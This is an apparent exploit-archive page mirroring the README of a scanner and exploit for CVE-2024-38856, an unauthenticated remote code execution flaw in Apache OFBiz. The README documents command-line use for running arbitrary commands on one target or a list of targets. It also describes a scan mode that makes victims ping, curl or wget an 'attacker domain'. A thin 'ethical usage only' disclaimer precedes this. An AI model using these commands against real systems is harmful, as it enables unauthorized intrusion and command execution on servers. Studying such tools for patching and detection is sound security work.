Associated Vulnerability
Title:Apache OFBiz: Unauthenticated endpoint could allow execution of screen rendering code (CVE-2024-38856)Description:Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
Description
Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)
Readme
# CVE-2024-38856
For Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.
CVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit
- This issue affects Apache OFBiz: through 18.12.14
# Usage
```
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ █████╗ █████╗ ███████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ╚════██╗██╔══██╗██╔══██╗██╔════╝██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗█████╔╝╚█████╔╝╚█████╔╝███████╗███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚═══██╗██╔══██╗██╔══██╗╚════██║██╔═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██████╔╝╚█████╔╝╚█████╔╝███████║╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚════╝ ╚════╝ ╚══════╝ ╚═════╝
Github: https://github.com/securelayer7/CVE-2024-38856_Scanner
By: Securelayer7(yosef0x01 & Zeyad Azima)
usage: cve-2024-38856_Scanner.py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-s] [-d DOMAIN] [-f FILE]
CVE-2024-38856 Apach Ofbiz RCE Scanners.
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target host
-p PORT, --port PORT Target port
-c COMMAND, --command COMMAND
Command to execute
-s, --scan Perform scan with ping, curl, and wget
-d DOMAIN, --domain DOMAIN
Domain (attacker domain) to scan with ping, curl, and wget
-f FILE, --file FILE File containing a list of targets in the format http(s)://target,port
```
## Arguments
- `-t, --target <host>`: Specifies the target host. This cannot be used with the `--file` option.
- `-p, --port <port>`: Specifies the target port. Also, this option is required if the port is not specified in the targets file.
- `-c, --command <command>`: Specifies the command to execute on the target.
- `-s, --scan`: Enables scan mode. When this option is used, the script will perform a series of predefined commands (`ping`, `curl`, `wget`) on the specified domain.
- `-d, --domain <domain>`: Specifies your domain (attacker domain) to use in the scan with `ping`, `curl`, and `wget` commands. This option must be used with `--scan`.
- `-f, --file <file>`: Specifies a file containing a list of targets in the format `http(s)://target,port`. This option cannot be used with `--target`.
`Global Port`: When scanning targets file, You can exclude `,port` and use `-p` to set a global port for all targets.
## Single Target
- Normal Mode
```bash
python cve-2024-38856_Scanner.py -t <target> -p <port> -c "command"
```
- Scan Mode
```bash
python python cve-2024-38856_Scanner.py -t <target> -p <port> -s -d <domain>
```
## Targets File
- Normal Mode
```bash
python exploit.py -f <file> -c "command"
```
- Scan Mode W/ Global Port
```bash
python exploit.py -f <file> -p <port> -s -d <domain>
```
# Screenshot:
File Snapshot
[4.0K] /data/pocs/825e76d69ec88b65a1e866c3f7f91c4ca1929256
├── [7.8K] cve-2024-38856_Scanner.py
└── [5.1K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →